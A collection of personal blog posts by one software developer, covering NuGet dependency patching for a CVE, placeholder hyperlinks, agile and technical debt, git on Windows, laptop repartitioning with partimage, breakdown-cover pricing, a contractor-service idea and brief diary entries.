Say you depend on [Microsoft.AspNetCore.Http v2.2.2](https://www.nuget.org/packages/Microsoft.AspNetCore.Http/2.2.2) (which is the latest available at time of writing), which in turn depends on [Microsoft.AspNetCore.Http.Abstractions >= v2.2.0](https://www.nuget.org/packages/Microsoft.AspNetCore.Http.Abstractions/2.2.0) (also currently the latest) which in turn depends on [System.Text.Encodings.Web >= 4.5.0]()
And then you discover, say, just for a fun example, that [System.Text.Encodings.Web v4.5.0 has the Remote Code Execution (RCE) Vulnerability CVE-2021-26701](https://github.com/dotnet/announcements/issues/178).
Thankfully Microsoft have released a patch release with a fix for the CVE: [System.Text.Encodings.Web v4.5.1](https://www.nuget.org/packages/System.Text.Encodings.Web/4.5.1)
So obviously you'll just upgrade your packages, run CI, make a cup of tea and ship to prod, right? Wrong.
But it says `>= 4.5.0`, so shurley it'd just upgrade it?...
Apparently not. It seems that for whatever reason nuget actually prefers the *lowest* compatible patch release. Go figure. So it won't upgrade.
### Checking the source of truth
Because I'm starting to doubt my sanity at this point, let's dive in to the source code for the middle package to make sure we're not just being ignorant about how it actually works.
`Microsoft.AspNetCore.Http.Abstractions` has abstracted out the version info for its dependencies to another file, you can see the defined version of the [...Encodings.Web dependency as at v2.2.0 here](https://github.com/aspnet/HttpAbstractions/blob/release/2.2/build/dependencies.props#L24)
```
<SystemTextEncodingsWebPackageVersion>4.5.0</SystemTextEncodingsWebPackageVersion>
```
which is then [referenced in the `.csproj` here](https://github.com/aspnet/HttpAbstractions/blob/release/2.2/src/Microsoft.AspNetCore.Http.Abstractions/Microsoft.AspNetCore.Http.Abstractions.csproj#L23)
```
<PackageReference Include="System.Text.Encodings.Web" Version="$(SystemTextEncodingsWebPackageVersion)" />
```
On the face of it you'd think that this meant it was pinned to an exact version, but microsoft in their infinite desire to pander to the lowest common denominator (i.e. idiots and n00bs) decided that `1.0` should actually mean `1.*`.
| Notation | Applied rule | Description |
|----------|--------------|----------------------------|
| 1.0 | x ≥ 1.0 | Minimum version, inclusive |
| ... | | |
Source: [NuGet version range definitions](https://docs.microsoft.com/en-us/nuget/concepts/package-versioning#version-ranges)
It doesn't even define whether it will upgrade major, minor, or just patch releases. Horror-show.
## lock files
Lock files don't actually help much here, but are a good idea, so if you want to use them here's what I've learned about `packages.lock.json` files in Microsoft-land.
NuGet is veeeeeeeeeeery late to the lockfile game. A lockfile is just a second file that lists the dependency tree that was actually calculated for a given set of top level dependencies. Useful for repeatable builds and lets you see what's being resolved, but doesn't actually help fix the problem here as the point of lockfiles isn't to manually futz with them, it's just to do repeatable builds. And futzing with them would confuse everyone, and is made a little harder with the inclusion of checksums.
It is possible to [manually enable lockfiles](https://devblogs.microsoft.com/nuget/enable-repeatable-package-restores-using-a-lock-file/) by adding the following to a csproj file:
```xml
<PropertyGroup>
<RestorePackagesWithLockFile>true</RestorePackagesWithLockFile>
</PropertyGroup>
```
I very much enjoyed [this multi-comment rant at the NuGet team](https://github.com/NuGet/Home/issues/5602#issuecomment-450269920) for basically being behind the times and always making poor decisions.
There is a slightly harder problem that microsoft have so far failed to sort out of [managing packages across a whole solution](https://github.com/NuGet/Home/wiki/Centrally-managing-NuGet-package-versions) (i.e. multiple projects). Though I can't help thinking that it's mostly hard because of the mess they've allowed to build up so far. (For example encouraging people to create multiple solutions with a mix of project files included, and the horror that is the one-giant-tree TFS system.)
## Forcing the upgrade
So it seems the only way to force the upgrade of the vulnerable "transient" dependency (i.e. one not directly specified in your `.csproj` file) is to add it as an explicit dependency directly to the `.csproj` `PackageReference` entries. This is lame, and likely to cause confusion later. Make sure your commit message is clear as to why you've added this seemingly nonsense dependency.
```xml
<ItemGroup>
<PackageReference Include="System.Text.Encodings.Web " Version="4.5.1"/>
</ItemGroup>
```
## Getting notified of dependency updates
If you run any production code you can run an analysis tool like [Snyk.io](https://snyk.io/) or [dependabot](https://github.com/dependabot) to check for such CVEs popping up in your dependency graph.
You'll probably want to install a local version of whatever you use to avoid the CI loop for every change you make, [snyk has a visual studio extension](https://marketplace.visualstudio.com/items?itemName=snyk-security.snyk-vulnerability-scanner).
<file_sep>---
title: "mountain bike stolen"
date: 2006-11-24
slashdot_url: https://slashdot.org/journal/136097/mountain-bike-stolen
---
<p>Some low life stole my mountain bike on sunday night.<br>Bolt cropped both locks.<br>Was in the bike shed behind the closed gate behind the flats.<br>Bastards.</p>
<file_sep>---
layout: post
title: Unfinished hyperlinks - add a todo
date: '2013-05-25T10:03:00.001Z'
author: <NAME>
tags:
modified_time: '2014-11-07T15:22:19.522Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-4587715440628289713
blogger_orig_url: https://timwise.blogspot.com/2013/05/unfinished-hyperlinks-add-todo.html
---
Just a quick post;
# Stop doing this
href="#"
# Start doing this
href="#todo"
# Why?
I'd like to promote a change to the habit of using '#' as the placeholder for a the url of a new hyperlink when you don't yet know where it'll link to: instead set the href to "#todo". This follows the //todo pattern recognised for unfinished code, and means you can now search your codebase for any links you forgot to finish off.
<a href="#">new link</a>
becomes
<a href="#todo" onclick="alert('Not Implemented');return false;">new link</a>
Demo: <a href="#">before</a> becomes <a href="#todo">after</a>
It will also give clues to any sharp-eyed testers / users that they should
report a bug for you as the url will change to #todo when the unfinished link
is clicked. It can often be seen in the status bar too. This has the handy
side-effect of avoiding the annoying jump to the top of the page that is the
default behaviour when you click on a # link that's a placeholder.
For bonus points another little trick I like is to add a click handler with an
alert to make it really obvious to any early users / testers that this is not
done yet, and I've found this saves a lot of questions when you genuinely
haven't finished, and also guarantees a quick bug report when you should have
(not that I ever forget any of course :-D)
<a href="#">new link</a>
becomes
<a href="#todo" onclick="alert('Not Implemented');return false;">new link</a>
Demo: <a href="#">before</a> becomes <a href="#todo" onclick="alert('Not Implemented');return false;">after</a>
You can automate giving all these links an alert with the following (cheers to
"unknown" in the blogger comments)
$("a[href=#todo]").click(function () { alert('Not implemented yet.') });
Simple and effective.
If you agree, please help spread the word. Perhaps by retweeting [my tweet](https://twitter.com/tim_abell/status/338235507203002368)
* * *
P.S. This goes hand in hand with a technique of picking points during development at which there should be no todo's left in your codebase with the exception of those with references to outstanding user story / bug numbers. I suggest before marking a user story as done, and at the end of each sprint as good points to review all todos in your codebase.
Further reading:
* [The case against TODO - wordaligned.org](http://wordaligned.org/articles/todo)
* [Using a JetBrains IDE to manage todos](http://blog.jetbrains.com/webide/2012/10/managing-todo/)
<file_sep>---
title: "mourn"
date: 2004-10-26
slashdot_url: https://slashdot.org/journal/88222/mourn
---
<p>It is truly a sad day for music today.<br>The king of radio is dead.</p>
<p>This leaves a gap in my life.</p>
<file_sep>---
layout: post
title: The trouble with agile is it's a bit too good
date: '2012-01-17T03:21:00.013Z'
author: <NAME>
categories: [niggle, agile, project management]
modified_time: '2012-01-17T09:56:42.349Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2568814673689579544
blogger_orig_url: https://timwise.blogspot.com/2012/01/trouble-with-agile-is-its-bit-too-good.html
---
So you've gone **Agile!** Woo! Well done! You've escaped the last millennium's
software practices at last! And boy do you feel in *control* at last! The
iterations are flying past, the story points are getting done at a rate you
could only have dreamt of. No longer do you wonder what your development team
are up to for months at a time, with that nagging feeling that you are pouring
money in and you're not getting best "value".
Seems like some kind of productivity utopia doesn't it?
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/6606813059/"><img
src="https://live.staticflickr.com/7172/6606813059_304696d41b.jpg" alt="Photo of a waterfall in Wales"></a>
</div>
But there's still something not quite right isn't there? Are the technical team
*still* moaning (pah, that's just technical people isn't it? ... or is it? they
often have a point, just usually a difficult one). There's this thing they are
always going on about, maybe it changes day to day, maybe it's the same. Maybe
it doesn't seem well enough defined to *deserve* a story. Maybe it just some
long term gripe that's never quite as important as all those other items in the
backlog that have a priority of "O.M.G. if we don't do this by the 14th of this
month we're all DEAD!!$$£##£!!!", so it keeps getting barely scheduled and
certainly never [done, done,
done](http://codebetter.com/jeremymiller/2006/04/14/code-complete-is-a-lie-done-done-done-is-the-truth/)!
(Okay, calm down excitable agile people, saying it once is fine.) But hey
*that's the process* so it must be right, if it doesn't make it, it *can't*
have been that important. Can it?
Well, it's time for some unscientific theorizing.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/6597177893/"><img
src="https://live.staticflickr.com/7151/6597177893_1b72a38092.jpg" alt="Atomospheric photo of clouds"></a>
</div>
I've been doing a bit of job hopping recently (nothing on the scale of
contracting, but I've seen a few different things, and a few different
approaches to project management). And I've noticed something in the two
examples of agile
([SCRUM](http://en.wikipedia.org/wiki/Scrum_%28development%29) specifically)
I've been close to that bothers me.
> “When it comes to the detail of the work, the manager is relying on the
> expertise of their staff.”
As a bit of background, remember that software development is a highly skilled
job. Software development is one of those funny worlds of work where the
employee inevitably knows more than the manager. The manager will likely have
more broad context (I really hope so, for that matter), but when it comes to
the detail of the work, and the *right* thing to do, the manager is relying on
the expertise of their staff to make detailed decisions. This is as it should
be given that the developers spend all their working hours, often more,
immersed in the detail, keeping up with the current technology, and becoming
ever more skilled at the job. Even if a manager is initially just as
knowledgeable in the field as their staff, just by virtue of spending more time
managing than doing (nothing wrong with that of course), they will inevitably
become less knowledgeable than their developers over time (whether they admit
it or not, and don't we all know someone who still thinks they know
everything!)
Okay, I'll get to the point already (this had better be good).
If you have moved from one of the less well controlled project management
methods (including the "general panic" approach), then you may or may not have
realised that **a fundamental shift in power has occurred**. The ability to
direct the way your development team spends their time has moved more into the
hands of the manager, and away from the hands of the individual developers. On
the whole I consider this a good thing, as individual developers deciding to do
things by fiat doesn't always help a company with its immediate deadlines, and
there is a much improved ability under the new regime to pick a goal and get
there more or less on time (unless you are just paying lip service to SCRUM),
with fewer nasty surprises along the way (such as, the good old "where did that
month go?" experience). In the past, management could give the developers
direction one month to the next, but day to day was a bit of a mystery, and
without SCRUM in place too it was much overhead to cope with. Now, *every* day
is accounted for. Life is good, the company gets more of what it asks its
developers for.
Every developer I have worked with has wanted to do a good job for the company they are working for. And they have all been generally competent at both coding, and interacting with management in getting the job done. So if they are good people, and we are so much more "productive" now, then why were they *wasting* all this time before? Well, to an extent you can explain the improvements by the elimination of some of the tail chasing exercises that happen under less disciplined approaches to project management. But that's not quite enough. There's something else, and **it's a question of perceived priorities** and the effect they have on what gets done.
When you have your head under the bonnet, you'll notice all the leaks and all the frayed cables. And as anyone who's taken their car to a garage will know, the mechanic can always find something to suck their teeth about and charge you an extra £150\. But when you are just driving the car it all seems just peachy till service time. But why do you give in and pay up for that thing you've never heard of? Surely if the car was fine when you were driving, then it *must* be okay? Well, I don't know about you, but for me it's the fear of ending up as a pile of <span style="color: rgb(153, 0, 0);">tomato ketchup</span> on the inside of my windscreen when I finally find out why that thing I can't even name was actually important. So how is this a good analogy? No-one ever died from bad software, right? Well the point is, the mechanic is skilled (*like the developer*), and I am not (*like the manager*). Like the manager, I have to decide which things to spend my money on and which things to pretend I know about and leave till the MOT fails.
Software developers, being skilled tradespeople, always have an eye on the long
term, and will always be balancing the current panic from the sales department
against what is good for the company in the long run. In the past, when you
used to lose months at a time, it was often partly because the developers were
taking some time to look after the company's long term interests. In hindsight
it is easy to justify the long term work that was done with some glib comment,
as it's no longer really up for discussion; you can't get the time back after
all. But imagine if all these long term things had to be justified *before*
they were done, even if the manager doesn't know what on earth the developers
are talking about. Well you know what, a lot of it wouldn't get done, and the
developers who really care about your long term future (i.e. those you haven't
ground down yet into despondency yet by ignoring them for years on end), would
get narked. If it's hard to "put a business case for" then a lot of good
developers I know will just not bother, after all they don't have to save
management from themselves, that wasn't in the job specification, and people
don't like being saved from themselves anyway. Unfortunately, this is exactly
the change that moving to SCRUM introduces. Developers can no longer "just do"
something that takes more than a day, no matter how much it needs doing in the
long run, as it will be blindingly obvious at the daily stand-ups that they are
not sticking to tasks, and are going to make an iteration miss its target.
After all each iteration is likely already chock full of "[must
haves](http://en.wikipedia.org/wiki/MoSCoW_Method)", and even if a developer
puts the effort in to get a long term piece of work into an iteration, it will
always end up lower priority than user stories for customer visible deadlines,
and therefore likely still not get done (unless you are getting your velocity
right, which of course you should be).
<span style="color: rgb(0, 0, 0);">Interlude.</span> You may now hum to
yourself for a bit before I attempt to tell you how to fix it.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/6495790775/"><img
src="https://live.staticflickr.com/7005/6495790775_7190968d21.jpg" alt="Photo of a bench carved from a tree in the woods"></a>
</div>
So what to do? In a way maybe it's no different to the car analogy. Make sure
you (management) get enough long term stuff into the iterations, and give them
just as much priority as anything else. Make sure they get *done*! Just as if
they were a short term deadline. Then in the long run, the wheels won't fall
off your software, at least not while you're driving. <span style="color:
rgb(102, 102, 102);font-size:85%;">(This blog post contains no warranty, road
conditions my vary, any number of factors may cause the wheels to fall off your
software. Especially if driven over rough specifications.)</span> Make sure
your team of developers know that you are committed to this so that they do
actually come forward with the things they *know* need to be done sooner or
later. (If you don't know about it you certainly can't get it fixed.) Perhaps
you could create a separate long term plan with the help of the team that
provides for long term needs, giving it real deadlines that are as immovable as
whatever conference you are showing at next. If you have to justify it to
others you can say "because the long term is just as important to our business
as the now"! Have the courage of your convictions. Back the long term as well
as the short term. Always have an eye on the build up of outstanding long term
items (c.f. [technical debt](https://en.wikipedia.org/wiki/Technical_debt)). If
the long term plan doesn't look like it fits with what you *have* to deliver
day to day, then maybe you need to step back and look at your software
architecture as a whole, or the resourcing in your team. I would suggest a
practical plan: set a percentage of time that will be spent on the long the
term items, say 10%, which is ring fenced for use by the technical experts (the
developers), for making sure the long term needs of your software are looked
after.
Sooner or later, if things run their new agile course, the chickens will come
home to roost, and you'll start to wonder why it's taking longer and longer to
get those features out, or more time will be lost to bugs, or things will just
start to outright fail. So I urge you to think about the long term and not
forget that the manager is not the expert in the detail - that's what your
developers are there for. So listen to your techies and the advice they have on
the balance of priorities, and take that into account when creating and
prioritising your backlog. You will have a happier team and happier software as
a result.
So in summary:
* Moving to agile is excellent, but prevents your technical experts from
quietly fixing things for you to the same extent.
* Don't forget the long term in the excitement of getting features done,
done, done!
<file_sep>---
title: Link your outlook calendar with your google calendar
layout: post
---
If you have a Google/GSuite calendar and a Microsoft Teams/Office365/Outlook calendar you can get the Microsoft Outlook calendar to pull in all the events from your Google calendar which is handy when you want to know if you have any gaps or conflicts.
Amazingly if you move google entries around in the outlook calendar they changes are pushed back to the google calendar.
## Link the Google calendar into the Outlook calendar
* Go to your Teams calendar
* Click the "add calendar" button
[](/images/blog/google-teams-calendar/1-add-cal.png)
Here you can see the "Add calendar" button as well as the end result of showing the two calendars together (google in red, outlook in blue)
* Click "Add personal calendars" and follow the instructions. The below shows the result. (The calendar defaults to blue but we can change that).
[](/images/blog/google-teams-calendar/2-connect-to-google.png)
## Give the Google calendar a different colour
You can then give the calendar a different colour in "Edit my calendars"
[](/images/blog/google-teams-calendar/3-change-colour.png)
<file_sep>---
layout: post
title: AA Gold member benefits, the real cost
date: '2012-07-10T19:13:00.000Z'
author: <NAME>
tags:
modified_time: '2012-07-21T18:01:03.574Z'
thumbnail: http://1.bp.blogspot.com/-A4lqKF45sig/T_x3sQI1LxI/AAAAAAAAAHE/b0U0t-K1vZE/s72-c/20120710_001.jpg
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-6561884291165371407
blogger_orig_url: https://timwise.blogspot.com/2012/07/aa-gold-member-benefits-real-cost.html
---
# Breakdown cover maths
So, I'm getting rather fed up with the AA taking the michael every year with
their renewals. Yes, I gather the RAC are just as bad but I think they need to
realise their customers aren't stupid, know exactly what they are playing at,
and can do the maths.
I want to highlight what I think is a particularly dirty trick, making
something look like a free perk when it's anything but.
# So here's some numbers:
This is for a single car policy covering Roadside, Home Start and Relay
starting July 2012 paying annually for a year up front. (The monthly option is
10% more expensive, go figure). Numbers rounded to pounds.
* Renewal through the post: **£135**
* Matching [RAC cover](http://www.rac.co.uk/uk-breakdown/)(checked online &
by phone): **£101**
* [AA online
price](http://www.theaa.com/breakdown-cover/uk-breakdown/view-options.do?optMshp=vcon300)
for new customers: **£92** -(so much for 6 years loyalty, a **<span
style="color: red;">£43</span>** kick in the teeth)
* AA phone price: **£116**
* AA phone price _without gold membership "benefits"_: **£89**
That means, the AA are pricing their gold benefits at **<span style="color:
red;">£27</span>** even though they look like they are free on the renewal
letter! Some cheek.

I queried the details of this so called benefit and established the following:
* _"Accident Management"_ - means being towed by the AA after an accident
(something you may be covered for under your car insurance policy)
* _European Breakdown Cover_ - only useful if you are going abroad
(obviously), did you really want to be paying for it?
* _"Family Associates Cover for under 17s"_ - something about teenagers, I
don't have any so not very useful to me
* _Key Insurance_ - this could be valuable, but £27/year sounds like very
expensive insurance to me even though they are expensive items to replace.
* _Legal Advice_ - **Included as standard!** So not a gold benefit at all.
Weasels.
* _Technical Advice_ - **Included as standard!** See above. Still weasels.
So it turns out that the supposed discount of **£44.90** on the posted renewal
was actually a **<span style="color: red;">£46</span>** insult to my
intelligence.
I'm no money saving expert, but that's outrageous.
<file_sep>---
layout: post
title: Git, Windows and Line endings
date: '2012-01-11T09:05:00.009Z'
author: <NAME>
tags:
- windows
- git
- critique
modified_time: '2012-05-10T10:36:45.076Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-5718834994106059896
blogger_orig_url: https://timwise.blogspot.com/2012/01/git-windows-and-line-endings.html
---
I have come to the unfortunate conclusion that git is not the perfect tool for
teams developing exclusively on Windows. And by that I mean, I cannot recommend
it unconditionally as I would like to be able to do.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/6375201587/"><img
src="https://live.staticflickr.com/6237/6375201587_3a4b7d4a19.jpg"
alt="Slightly amusing photo of for-sale sign in a bin"></a>
</div>
The main competition I would be considering is Microsoft's TFS.
I have had plenty of experience working with git under windows (as well as on
linux), and what follows are the three reasons I can't wholeheartedly recommend
git to a pure windows team. There are of course many reasons to avoid the
alternatives, but that is outside the scope of what I wanted to say here.
Just for the record, in spite of these flaws, I still think git is the best
thing since sliced bread.
# File renaming
This is an outright bug that unfortunately the msysgit developers have chosen
not to address (as is their prerogative), and I don't have the resources needed
to provide a patch of sufficient quality or run my own variant of msysgit.
* [Git-for-windows page on all the case issues](https://github.com/git-for-windows/git/wiki/File-names,-Branch-names,-Path-quotation,-Executable-bit-and-file-modes,-core.FileMod://github.com/git-for-windows/git/wiki/File-names,-Branch-names,-Path-quotation,-Executable-bit-and-file-modes,-core.FileMode)
The simple test is to change the case of a file's name, which fails, however
most obvious workaround (rename to another file name in one commit, and back
again in another) actually makes the problem worse. This is because the bug
also affects checkouts, so when git on another team member's machine attempts
to update the working copy directly from its previous state directly to the
requested revision (usually the latest), the "checkout" fails half way through
leaving the team member flummoxed.
This is a particularly insidious bug for a team. You will generally have some
people who are stronger with git (or pick it up quickly), and some who are not
interested or struggle with the new system. Unfortunately if your team trips
over this bug, *every* team member will have to work out how to get past it,
and it is not immediately obvious from the symptoms what the problem might be
or how to solve it. It also leaves the victim's source directory in an
inconsistent state, so if they try to ignore the problem and carry on they will
get into more of a pickle.
Having to notify every member of your team that you have changed the case of a
file and point them to a workaround is hardly going to endear them to their new
fangled source control "git".
A real world example of why this might happen:
File in your source tree that has been around since before you had any naming
conventions: "_VATRate.cs_" containing a _VATRate_ class. (Value Added Tax).
You now enforce a naming convention where Acronyms are in Pascal case, i.e.
_VatRate_. In order to rename the class you must also rename the file,
therefore _VATRate.cs_ is renamed to _VatRate.cs_, triggering the above bug for
your entire team whenever they happen to fetch (and worse every time they
switch between branches that do / don't have the patch).
# Line Endings
As you know from the depths of history, our beloved operating systems have
chosen different line ending systems:
* Mac: CR
* Windows: CRLF
* Linux/Unix: LF
Git has an ingenious way of handling this, and gives you three choices for
handling cross platform differences (see [git config /
core.autocrlf](http://linux.die.net/man/1/git-config)):
1. Leave them the hell alone (_false_)
2. Store them in git as LF and convert them on checkin/checkout (_auto_)
3. convert them when you checkin a file but not on checkout (_input_)
Which in theory is fine and dandy, and either of the first two should both be
fine for a pure windows team... if it wasn't for the patch tools. It would seem
that as soon as you start applying patches and using some of the more advanced
tools that come with git, they introduce inconsistent line endings into checked
in files. You also have an issue with the configuration being client side, so
it is likely one of your team members will get the setting wrong one day and
make a mess.
In my experience, neither of the first two settings are painless under windows,
leaving you with a constant overhead of meaningless / noisy diffs, and time
spent troubleshooting, and running tools to tidy up files that have had their
line endings corrupted.
It's not a show-stopper, but it does make it harder to recommend that a team
avoid TFS (for example) and use the "better" solution with all its benefits.
# Unicode file handling
I may not have my facts completely straight on this one as I'm no expert in
this area, so please forgive me and provide any corrections / references you
can in the comments.
Visual Studio has a tendency to add a byte order marker to source files. Which
as far as I know is fine. Unfortunately git then is inclined to interpret the
file as binary and refuse to show diffs.
(I'm a little uncertain on this one, but I have seen the symptoms first hand,
and it happens more than is comfortable)
# Footnote: Speed
Git is held up as an example of fast source control, and seems faster than
anything else I've used, however it's also worth mentioning that rewriting
commit histories (rebase), refreshing the status and tab-completion are (last
time I checked) all significantly slower on msysgit (windows) than git on
linux.
<file_sep>---
title: "Tonight"
date: 2004-09-20
slashdot_url: https://slashdot.org/journal/84316/tonight
---
<p>Just made dinner. Fish fingers, left over roast spuds, veggie gravy granules, yummy. Candle lit dinner for one! But that's ok, cos life isn't that bad, been out for a ride, lovely windy weather down on the lake. Was hoping to get out on a windsurfer, no chance. Have to be this weekend.</p>
<p>And I have new whiteboard which is cool.<br>Pic: <a href="http://www.timwise.co.uk/images/141_4136.JPG">http://www.timwise.co.uk/images/141_4136.JPG</a></p>
<file_sep>---
layout: post
title: IT Contractor buddy
date: 2017-05-03 13:31:51.000000000 +01:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags:
- startup
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/05/03/it-contractor-buddy/"
---
## A new job-hunting assistant for contractors
Calling all IT contractors; would you pay to have some of the pain of contract hunting taken away?
I'm considering launching a business for IT contractors like myself that will do the tedious and time-consuming bits of job hunting.
If this is something you think you'd be interested in then [sign up to the mailing list for early access](http://eepurl.com/cNqrrf).
## Concept
* Search job postings for you, letting you know when good matches come up, across multiple job boards.
* Submit your CV on your behalf
* Keep track your applications (when you sent your CV where for what rate).
* Handle first contact from companies / recruiters, validating it's worth your time
* A simple monthly fee, with no long-term commitment.
* No cut of your contract rate and no fee per placement.
A concierge service for IT contractors.
As I know from first-hand experience the job hunt is a time-consuming slog where being on top of all your leads is critical to avoid being taken advantage of rate-wise by a sharp-eyed contingency recruiter, or having a deal ruined by duplicate CV submissions.
<div class="flickr-pic">
<a data-flickr-embed="true" href="https://www.flickr.com/photos/tim_abell/33461099014/" title="IMG_20170424_121829_crop"><img src="https://live.staticflickr.com/4164/33461099014_c2ce23d162.jpg" width="500" height="114" alt="IMG_20170424_121829_crop"></a>
</div>
## How is this different from all the other recruiters?
In house recruiters are agents of the hiring company, and you may have to deal with many of these. We are working for you, the contractor, no matter how many companies and agencies you are talking to. They can only help you with respect to their company.
Contingency recruiters (i.e. 3rd party recruiters) are trying to insert themselves into the deal between you and a client, sometimes with the okay of that client, sometimes without. Unlike them we are not trying to skim money off your contracts, instead we are providing a service that helps you avoid the painful bits of the job hunt, for a straight-forward monthly fee that reflects the value we provide to you. Value for value. These recruiters will not help you with leads from other recruiters, in fact letting them know about other leads is a recipe for disaster.
So neither of these will help you with your overall job hunt. You still have to manage all your leads yourself.
## How is this different from a talent agent?
You may have [read the new-yorker piece about](http://www.newyorker.com/magazine/2014/11/24/programmers-price) the agent [10x](https://www.10xmanagement.com/).
* They [charge 15% of your rate](https://www.10xmanagement.com/faq/) (a pretty big cut imho!) whereas we charge a flat rate for the service we provide; value for value.
* They are limiting themselves to the mythical 10x'er. So even though they offer a lot of the concierge I'm offering, you probably can't get them to take you on. We however will take on even non-rocket-scientist contractors as we scale, free from BS hype about "rockstars".
* Our service is clearly working for you and no-one else whereas with 10x's percentage fee it's not clear who they work for no matter what the marketing says.
* 10x are attempting to find clients directly, just like every other contingency recruiter. We don't mind where your work comes from as we aren't trying to insert ourselves into the deal, so you won't be limiting your market by working with us, in fact we'll make it easier for you to cover more of the market by doing the hard work for you.
## Sign up now!
If you think this is something you might use, then please [sign up to the mailing list](http://eepurl.com/cNqrrf) so you can get first access. There will initially be limited spaces for clients so that we don't overstretch, so [sign up now](http://eepurl.com/cNqrrf) for first-come first-served early access.
<file_sep>---
title: "swimming"
date: 2004-02-26
slashdot_url: https://slashdot.org/journal/63307/swimming
---
<p>well, that wasn't too bad at all.<br>did 500m in first half hour (definitely not non-stop though) and then i did another couple of lengths. (35 mins in all).</p>
<file_sep>---
title: "M$"
date: 2004-02-16
slashdot_url: https://slashdot.org/journal/62169/m
---
<p>Look, <a href="http://www.microsoft.com/technet/treeview/default.asp?url=/technet/ScriptCenter/Tools/twkmatic.asp">comedy </a> from Micro$oft!</p>
<file_sep>---
layout: post
title: Today's project - partimage enhancement
date: '2007-03-13T22:01:00.000Z'
author: <NAME>
tags:
- partimage
- dev
- linux
- oss
- project
modified_time: '2007-03-13T22:27:10.644Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-6030191776095000293
blogger_orig_url: https://timwise.blogspot.com/2007/03/todays-project-partimage-enhancement.html
---
*me and [partimage](http://www.partimage.org/)*
I recently reorganised the partitions on my laptop, with the help of some
invaluable OSS tools.
The laptop was split into OS partitions, with a data and swap partition at the
end, but I'd starting running out of space. I have since made ubuntu my only OS
at home, so no longer require multiple partitions. My partition table ended up
looking something like this: *data | OS | more data | swap*, and I wanted it to
look like this: *OS & data | swap*, but without having to rebuild (again).
With another linux box available with bags of disc space, I did something like the following:
* from each data partition and my home folder: `tar -cv datafolder | ssh
otherbox "cat > laptop/datafolder.tar"`, which gave me a tarball of all my
data
* boot into knoppix 4
* use partimage to save os parition image into filesystem of another
partition
* `scp osimage.img otherbox:laptop/`
* `fdisk` to set up new partitions
* pipe the image back into partimage across the wire: `ssh otherbox "cat
laptop/osimage.img" | partimage ....` plus some flags for batch writing to
new partition
* use parted (partition editor) to stretch partition image back up to full
size of new partition.
* fix grub with help from knoppix - `hda(0,2)` to `hda(0,0)` or something.
* remove references to non existent partitions from fstab
Which was all great, but I feel there's a feature missing from partimage.
Although it can read an image from stdin for writing to disc, it can't write an
image to stdout from disc. This would have saved me some thinking and some
hassle. So in the true spirit of OSS, I shall have a go at adding the
functionality.
So far, I have grabbed the source from sourceforge's svn server, managed to
compile the source (after being confused by a misleading error message) and
installed an IDE. I started with Eclipse, as I've been using it a bit recently
and really like it, but figure that perhaps the C++ devs aren't likely to be
java fans and maybe they would choose something else. So I've installed
KDevelop, and will be having a go with that.
<file_sep>---
title: "Swimming"
date: 2004-01-03
slashdot_url: https://slashdot.org/journal/57000/swimming
---
<p>Got up this morning and cycled to the pool. Swam 20 lengths (I think) in about 40 mins, at which point some french fish like people turned up and put me to shame. The mum dived in one end and covered half the length of the pool before even taking a stroke (or surfacing) then covered the rest in what seemed like three strokes. Bet she had no idea how hard it is for me to cover that distance.</p>
<p>Maybe I need lessons. I spotted a Reading Swimming Club bag in the changing rooms which is a bit of a clue.</p>
<p>Then I cycled back via the bike shop, which wasn't even open yet, so my gear changer is still bust. Though I did discover the <a href="http://www.slimsmith.com/rcc/home.html">reading cycling bunch</a> have a stand in Reading market on the first Saturday of the month, which is today I think.</p>
<file_sep>---
title: "shock! timwise.co.uk home page updated!"
date: 2005-03-18
slashdot_url: https://slashdot.org/journal/101268/shock-timwisecouk-home-page-updated
---
<p>About time too.</p>
<p>You can now see my complete set of browser bookmarks from my website. Pretty much updated daily.<br>Still a lot of tidying up to do as I've just shoved all my disparate bookmarks together. It's done with a bookmark synching extension for firefox, and it allows to keep all my bookmarks the same across computers / OSs profiles.</p>
<p>By the way, if you aren't already using it, then you really should give firefox a go. You'll never look back.<br><a href="http://www.mozilla.org/products/firefox/">http://www.mozilla.org/products/firefox/</a></p>
<p>Anything new your end?</p>
<p>My bebo contact details:<br><a href="http://www.bebo.com/friends/138748a653587b22">http://www.bebo.com/friends/138748a653587b22</a><br>"I am using a new service to keep in contact with my friends. Use the link [above] to become part of my address book. In the future I will be able to see any changes in your contact details."</p>
<p>xx</p>
<p>Tim</p>
<file_sep>---
title: The trap of two-stage commitments
layout: post
---
When you know there is a future time at which you'll have to "really commit" (e.g. sign something, put money down, put something in writing, commit publicly etc.) it's easy to blasély commit without thinking too hard about how things might have changed by the time the more concrete commitment is needed, or perhaps if you even really mean it. This is a trap!
There is an unspoken mismatch in understanding of what was just casually agreed:
- The person saying "yes" is often implicitly saying "assuming when actual commitment time comes this is still a valid choice", (consciously or unconsciously thinking to themselves "I can review this nearer the time and change my mind if needs be").
- The person hearing "yes", however carelessly given, is potentially hearing nothing but the "yes" and understandably thinks they can count on that regardless of further hurdles and levels of commitment.
The danger here is that even if you truly believed you could keep your word, circumstances can change, for example between verbal and written agreements, or between saying "I'll visit" and actually booking flights. Money issues, health, behaviour of others and many other things out of your control can get in the way.
I like to think I stick to my word, and that if I say I'll do something then I'll do it. I make an effort to think through whether I would or wouldn't do something before saying yes. What I have missed in my thinking sometimes is that **things change**, and I should be more reserved when answering the initial query. If circumstances don't change there would be no issue, but if they do then one can be in hot water.
On the first commitment it all seems kind of vague and far off, but on the second one it's very real, and you might realize you no longer want to honour your commitment for some reason, and now you are in a bad place of either breaking your commitment or violating your boundaries (if you can keep it at all).
The bias towards blindly saying yes and then regretting it all stems from being a "people pleaser" at heart, which probably goes back to ingrained behaviours learned in childhood. Wanting to give the "right" answer in the moment, even if the moment isn't right.
The problem with being to quick with a "yes" to please someone is that by the time you have to "actually commit", circumstances may have changed, and you may be looking for a way out.
